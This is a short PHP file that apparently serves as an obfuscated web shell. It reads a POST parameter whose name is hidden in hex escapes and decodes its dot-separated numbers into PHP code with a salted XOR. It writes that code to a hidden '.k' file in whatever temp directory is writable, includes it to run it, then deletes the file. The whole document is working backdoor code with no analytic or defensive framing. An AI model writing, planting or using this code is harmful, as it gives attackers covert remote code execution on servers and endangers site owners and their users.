<?php

if(count($_POST) > 0 && isset($_POST["\x68l\x64"])){
	$factor = $_POST["\x68l\x64"];
	$factor=explode (			"."	,$factor);  
	$marker = '';
            $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt1);
            $v = 0;
    
            while ($v <count($factor)) {
                $v7 = $factor[$v];
                $sChar = ord($salt1[$v %$lenS]);
                $dec = ((int)$v7 - $sChar - ($v %10)) ^ 65;
                $marker .= chr($dec);
                $v++;
            }
	$descriptor = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getcwd()]);
	foreach ($descriptor as $res) {
    		if (max(0, is_dir($res) * is_writable($res))) {
    $pointer = "$res/.k";
    if (@file_put_contents($pointer, $marker) !== false) {
	include $pointer;
	unlink($pointer);
	die();
}
}
}
}